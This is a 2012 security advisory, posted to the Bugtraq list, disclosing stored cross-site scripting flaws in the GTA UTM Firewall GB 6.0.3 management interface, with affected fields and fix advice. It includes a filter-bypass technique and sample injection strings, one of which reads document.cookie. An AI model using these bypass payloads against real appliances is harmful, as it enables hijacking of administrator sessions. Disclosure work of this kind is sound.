Home page logo
/

bugtraq logo Bugtraq mailing list archives

GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Mon, 08 Oct 2012 16:40:28 +0200

Title:
======
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities


Date:
=====
2012-09-30


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=579


VL-ID:
=====
579


Common Vulnerability Scoring System:
====================================
4


Introduction:
=============
The GTA family of Internet security firewall UTM systems has been expanded to include three new gigabit appliances. 
The GB-2500 Firewall UTM Appliance is one of GTA s most capable firewalls, designed for businesses with extensive 
network demands. Featuring a powerful Intel Dual-Core processor, two gigabits of RAM and four gigabits of static
 memory, the GB-2500 easily handles intensive, resource-demanding network configurations. The GB-2100 Firewall UTM 
Appliance provides robust protection and network reliability for SME organizations. Featuring flexible configuration 
options, straightforward implementation and uncomplicated maintenance and monitoring, the GB-2100 presents 
comprehensive protection that is adaptable to any network environment. The GB-820 Firewall UTM Appliance is designed 
for smaller offices, providing gigabit performance with all the features and tools available in larger appliances, 
but in a space-saving desktop unit. Built-in VPN acceleration provides the GB-820 with increased throughput, allowing 
organizations to easily handle periods of increased VPN activity.

All GTA Firewall UTM Appliances include our advanced firewall features - policy based NAT, virtual hosting via IP 
Aliasing, advanced routing such as BGP and Single-Sign on authentication - at no extra charge. Threat management 
features include DoS and an Intrusion Prevention System (IPS), basic content filtering and advanced email gateway 
features.

(Copy of the Vendor Homepage: http://www.gta.com )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web Vulnerabilities in the GTA UTM Firewall Firmware GB 
6.0.3.


Report-Timeline:
================
2012-05-20:     Researcher Notification & Coordination
2012-05-21:     Vendor Notification
2012-06-04:     Vendor Response/Feedback
2012-**-**:     Vendor Fix/Patch
2012-10-01:     Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Global Technology Assiciates Inc
Product: UTM Firewall Appliance Application vGB 6.0.3


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple persistent input validation vulnerabilities are detected in the GTA UTM Firewall Appliance Application 
Firmware GB 6.0.3.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The 
first 
vulnerability is located in the user remote password and pre-shared secret input fields & user account output listing. 
The secound 
vulnerability is located in the VPN Certificate emailAddress & subject with affect on the VPN Details Listing section. 
Successful 
exploitation of the vulnerability can lead to session hijacking (manager/admin), persistent phishing & stable 
(persistent) context 
manipulation in vulnerable modules or bound application sections. Exploitation requires low user inter action & a 
privileged 
application account.


Vulnerable Module(s):
                                [+] Users - [Configure -> Accounts -> Users] -  > Remote Access > L2TP / PPTP > Remote 
Password
                                [+] Users - [Configure -> Accounts -> Users] -  > Mobile IPSEC > Modify & ASCII  > 
Pre-shared Secret
                                [+] VPN Certificate - Input & Listing


Picture(s):
                                ../1.png
                                ../2.png


Video(s):
                                ../gta-waf.wmv


Proof of Concept:
=================
The persistent input validation vulnerabilities can be exploited by remote attackers with privileged user account & low 
required user inter action. For demonstration or reproduce ...

Note:
To bypass the invalid argument filter exception use an onload iframe to request your external content with cookies. 
Standard frames 
and script tags with double quotes will be blocked by the invalid argument exception & validation. To verify the bypass 
use also the 
wrong standard strings for the invalid argument validation.


Locations:                      remotePW_hidden, identity, form input desc, fullName, Pre-shared Secret, & emailAddress
Good Example Bypass String:     "><x src=http://www.vuln-lab.com onload=alert("GTA") < or "><x 
src=http://www.vuln-lab.com onload=alert(document.cookie) <
Wrong Example Bypass String:    >"<iframe src=http://google.com> or <script>alert("TEST")</script>


Review: Users - [Configure -> Accounts -> Users] -  > Remote Access > L2TP / PPTP - Password

<input name="edit" value="0" type="hidden"><input name="row" value="0" type="hidden"><input id="objRows" 
name="objRows" value="1" type="hidden"><input id="saltedPW" name="saltedPW" value="$1$_J9..Zyn$m..
Jp/6/lNxwLbwRmteT11" type="hidden"><input id="strength" name="strength" value="95" type="hidden"><input 
id="secret_hidden" name="secret_hidden" value="" type="hidden"><input id="allowGenCert" name="allowGenCert" 
value="1" type="hidden"><input id="remotePW_hidden" name="remotePW_hidden" value="" type="hidden">
<iframe src="user-list_data/[PERSISTENT SCRIPT CODE!]' <"=""></td></tr>
<tr>
<td

... & identity

class="forminput" id="identity" 
name="identity" type="text" size="60" maxlength="127" 
value=""><iframe src=[PERSISTENT SCRIPT CODE!]&
#34;) <" 
/> </td>
</tr>

... & fullName

<td colspan="3"><input class="forminput" id="fullName" 
name="fullName" type="text" size="60" maxlength="59" 
value=""><iframe src=a 
[PERSISTENT SCRIPT CODE!]") <" 
/> </td>
</tr>
<tr>

... & desc

<td colspan="3"><input class="forminput" id="desc" name="desc" 
type="text" size="60" maxlength="79" 
value=""><iframe src=a 
#34;[PERSISTENT SCRIPT CODE!]") <" 
/> </td>
</tr>


... or the secret_hidden

<input id="strength" name="strength" value="95" type="hidden"><input id="secret_hidden" 
name="secret_hidden" value="" type="hidden"><[PERSISTENT SCRIPT CODE!])' <"=""><input 
id="allowGenCert" name="allowGenCert" type="hidden" value="1" /><


URL:    http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3





Review: VPN Certificate - Details Listing

<tr>
<td class="formlabel">Subject:</td>
<td>emailAddress = "\"><[PERSISTENT SCRIPT CODE!]") <", 
CN = "\"><[PERSISTENT SCRIPT CODE!]") <", O = 
"><[PERSISTENT SCRIPT CODE!] <", L = 
"><[PERSISTENT SCRIPT CODE!]) <", ST = 
"><[PERSISTENT SCRIPT CODE!]) <", C = US, OU = 
"><i[PERSISTENT SCRIPT CODE!]") <" </td>
</tr>

Note: The vulnerable content certificate can also be exported via download function to review the problem.

URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3


Solution:
=========
Parse the input field values secret_hidden, remotePW_hidden, identity, form input desc, fullName & emailAddress. 
Restrict the name input fields  with a special filter when processing to load strings with tags like (< > , double 
quotes & co.  ...). 
Parse also the vulnerable output listing were the script code is getting unsanitized executed out of the waf 
application context.

Note:   Your company can use the following public non malicious string list to verify or update ...
URL:    http://www.vulnerability-lab.com/resources/documents/531.txt


Risk:
=====
The vulnerabilities can be exploited with low required user inter action & privileged user account.
The security risk of the persistent input validation vulnerabilities are estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm () vulnerability-lab com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - 
www.vulnerability-lab.com/register
Contact:    admin () vulnerability-lab com      - support () vulnerability-lab com             - research () 
vulnerability-lab com
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com                  - 
news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, 
videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, 
list (feed), 
modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a 
permission.

                                        Copyright © 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research () vulnerability-lab com



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault